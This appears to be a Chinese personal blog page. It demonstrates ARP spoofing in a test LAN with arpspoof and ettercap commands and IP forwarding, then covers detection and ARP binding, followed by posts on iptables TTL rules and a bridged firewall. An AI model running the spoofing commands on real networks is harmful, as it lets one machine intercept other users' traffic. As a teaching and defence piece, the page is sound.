海运的博客

有攻才有防，本次测试下ARP欺骗攻击，对防止ARP攻击有更好的了解，请勿用于非法用途。
测试网络环境如下：

路由网关IP：192.168.1.1 MAC：00:1F:A3:65:55:8D  
客户机A IP：192.168.1.3 MAC：00:0c:29:e7:cc:3b 
客户机B IP：192.168.1.5 MAC： 00:0c:29:c6:f8:da

客户机B用作ARP攻击欺骗，发起ARP包欺骗客户机A网关MAC为客户机B网卡MAC：

arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
0:c:29:c6:f8:da 0:c:29:e7:cc:3b 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c6:f8:da
0:c:29:c6:f8:da 0:c:29:e7:cc:3b 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c6:f8:da

客户机B欺骗网关客户机A MAC地址为客户机B MAC：

arpspoof -i eth0 -t 192.168.1.1 192.168.1.3
0:c:29:c6:f8:da 0:1f:a3:65:55:8d 0806 42: arp reply 192.168.1.3 is-at 0:c:29:c6:f8:da
0:c:29:c6:f8:da 0:1f:a3:65:55:8d 0806 42: arp reply 192.168.1.3 is-at 0:c:29:c6:f8:da

或：

ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.3/

客户机B开启数据包转发功能：

echo 1 > /proc/sys/net/ipv4/ip_forward

网关tracert客户机A：

traceroute 192.168.1.3
traceroute to 192.168.1.3 (192.168.1.3), 30 hops max, 38 byte packets
 1  192.168.1.5 (192.168.1.5)  1.307 ms  1.750 ms  1.241 ms
 2  192.168.1.3 (192.168.1.3)  2.358 ms !C  7.161 ms !C  1.876 ms !C

客户机A tracert网关：

tracert 192.168.1.1
traceroute to 192.168.1.1 (192.168.1.1), 30 hops max, 40 byte packets
 1  192.168.1.5 (192.168.1.5)  2.111 ms  1.962 ms  1.903 ms
 2  192.168.1.1 (192.168.1.1)  1.863 ms  1.753 ms  5.969 ms

看到了吧，真是吭爹呀，都走客户机B代理了。。。。

查看当前缓存ARP表：

arp -a

用arping查看当前网关MAC：

arping 192.168.1.1
ARPING 192.168.1.1 from 192.168.1.3 eth0
Unicast reply from 192.168.1.1 [00:1F:A3:65:55:8D]  0.958ms
Unicast reply from 192.168.1.1 [00:1F:A3:65:55:8D]  0.947ms
Unicast reply from 192.168.1.1 [00:1F:A3:65:55:8D]  0.942ms
#一般回应在1ms左右，如果远大于此数据代表被arp欺骗网关代理了

统计当前网段所有主机MAC表，然后根据缓存arp网关MAC和arping网关MAC查看哪个IP异常。

#https://www.haiyun.me
#!/bin/bash
for i in `seq 254` ; do
        arping -c 2 192.168.1.$i|grep ^Unicast|awk '{print $4,$5}'
    done

Windows下可使用nbtscan扫描当前网段信息：

nbtscan -f 192.168.1.0/24

或使用NMAP获取当前网段所有主机MAC：

nmap -sP 192.168.1.0/24

同时也可使用tracert跟踪查看网关IP是否正确：

tracert www.haiyun.me

Linux下绑定ARP：

arp -s 192.168.1.1 00:1f:a3:65:55:8d

Windows XP/2003绑定：

arp -s 192.168.1.1 00-1f-a3-65-55-8d

Windows 7/2008绑定：

netsh i i show in #查看要绑定网卡的IDX
netsh -c "i i" add neighbors 11 192.168.1.1 00-1f-a3-65-55-8d

TTL即Time To Live，用来描述数据包的生存时间，防止数据包在互联网上一直游荡，每过一个路由减1，TTL为1时丢弃数据包并返回不可达信息。
Iptables TTL模块可以修改收到、发送数据的TTL值，这模块很有趣，可以实现很多妙用。
TTL使用参数：

https://www.haiyun.me
--ttl-set #设置TTL的值
--ttl-dec #设置TTL减去的值
--ttl-inc #设置TTL增加的值

应用示例：
禁止被tracert跟踪到，traceroute跟踪时首先向目标发送TTL为1的IP数据，路由收到后丢弃数据包并返回不可达信息，以此递增直到目标主机为止。

iptables -A INPUT -m ttl --ttl-eq 1 -j DROP
#禁止TTL为1的数据包进入
iptables -A FORWARD -m ttl --ttl-eq 1 -j DROP
#禁止转发TTL为1的数据

禁止二级路由：

iptables -t mangle -A PREROUTING -i pppoe-wan -j TTL --ttl-set 2
#进入路由数据包TTL设置为2，二级路由可接收数据不转发。

1.设置桥接内网和外网：

brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig br0 netmask 255.255.255.0 192.168.1.2 up

配置Iptables防火墙，eth0为外网，eth1为内网。

#配置防火墙自身规则
iptables -P INPUT DROP
iptables -A INPUT –m state --state RELATED,ESTABLISHED –j ACCEPT
iptables -A INPUT -p tcp --dport 22 -m physdev --physdev-in eth1 -j ACCEPT
#配置转发规则
iptables -P FORWARD DROP
iptables -A FORWARD –m state --state RELATED,ESTABLISHED –j ACCEPT
iptables -A FORWARD -m physdev --physdev-in eth1 --physdev-out eth0 -j ACCEPT